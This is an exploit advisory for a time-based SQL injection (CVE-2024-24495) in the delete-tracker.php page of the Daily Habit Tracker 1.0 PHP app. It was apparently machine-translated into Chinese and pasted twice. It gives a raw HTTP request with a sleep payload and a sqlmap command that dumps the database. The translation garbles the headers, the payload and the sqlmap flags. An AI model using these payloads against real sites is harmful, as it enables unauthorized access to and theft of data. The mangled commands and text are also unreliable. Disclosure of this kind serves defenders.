#利用标题:每日习惯追踪器1.0 -SQL注入
#DATE: 2024年2月2日
#利用作者: yevhenii butenko
#供应商homepage: https://www.sourcecodester.com
#软件link: https://www.sourcecodester.com/php/...-using-php-and-php-and-mysql-source-code.html
#版本: 1.0
#测试在: Debian
#CVE : CVE-2024-24495
### SQL注入:
SQL注入是一种安全漏洞,允许攻击者干扰应用程序对其数据库的查询。通常,它涉及通过客户从客户端到应用程序的输入数据插入或“注入” SQL查询。成功的SQL注入漏洞可以从数据库中读取敏感数据,修改数据库数据(插入/update/delete),在数据库上执行管理操作(例如关闭DBMS),恢复DBMS文件系统上存在的给定文件的内容,在某些情况下,对操作系统发出命令。
###受影响的组件:
delete-tracker.php
### Description:
应用程序中SQL注入的存在使攻击者可以通过专门精心设计的请求向数据库发出直接查询。
##概念证明:
###手动开发
有效载荷`''';选择睡眠(5)#可以迫使数据库睡觉5秒:
````````
get/habit-tracker/endpoint/delete-tracker.php?tracker=5'''VBSElect+Sleep(5)%23 http/1.1
HOST: LOCALHOST
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:109.0)壁虎/20100101 Firefox/115.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
DNT: 1
连接:关闭
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:无
sec-fetch-user:1
````````

### sqlmap
将以下请求保存到
````````
get/habit-tracker/endpoint/delete-tracker.php?tracker=5 http/1.1
HOST: LOCALHOST
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:109.0)壁虎/20100101 Firefox/115.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
DNT: 1
连接:关闭
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:无
sec-fetch-user:1
````````
与
````````
sqlmap -r ./delete_tracker.txt - level 5-风险3-乘客- 零件-Technique=t -dump
````````
##建议
使用此跟踪系统时,必须更新应用程序代码,以确保用户输入消毒和适当的特殊字符限制。
#DATE: 2024年2月2日
#利用作者: yevhenii butenko
#供应商homepage: https://www.sourcecodester.com
#软件link: https://www.sourcecodester.com/php/...-using-php-and-php-and-mysql-source-code.html
#版本: 1.0
#测试在: Debian
#CVE : CVE-2024-24495
### SQL注入:
SQL注入是一种安全漏洞,允许攻击者干扰应用程序对其数据库的查询。通常,它涉及通过客户从客户端到应用程序的输入数据插入或“注入” SQL查询。成功的SQL注入漏洞可以从数据库中读取敏感数据,修改数据库数据(插入/update/delete),在数据库上执行管理操作(例如关闭DBMS),恢复DBMS文件系统上存在的给定文件的内容,在某些情况下,对操作系统发出命令。
###受影响的组件:
delete-tracker.php
### Description:
应用程序中SQL注入的存在使攻击者可以通过专门精心设计的请求向数据库发出直接查询。
##概念证明:
###手动开发
有效载荷`''';选择睡眠(5)#可以迫使数据库睡觉5秒:
````````
get/habit-tracker/endpoint/delete-tracker.php?tracker=5'''VBSElect+Sleep(5)%23 http/1.1
HOST: LOCALHOST
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:109.0)壁虎/20100101 Firefox/115.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
DNT: 1
连接:关闭
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:无
sec-fetch-user:1
````````

### sqlmap
将以下请求保存到
delete_tracker.txt
:````````
get/habit-tracker/endpoint/delete-tracker.php?tracker=5 http/1.1
HOST: LOCALHOST
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:109.0)壁虎/20100101 Firefox/115.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
DNT: 1
连接:关闭
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:无
sec-fetch-user:1
````````
与
-r
选项一起使用sqlmap
````````
sqlmap -r ./delete_tracker.txt - level 5-风险3-乘客- 零件-Technique=t -dump
````````
##建议
使用此跟踪系统时,必须更新应用程序代码,以确保用户输入消毒和适当的特殊字符限制。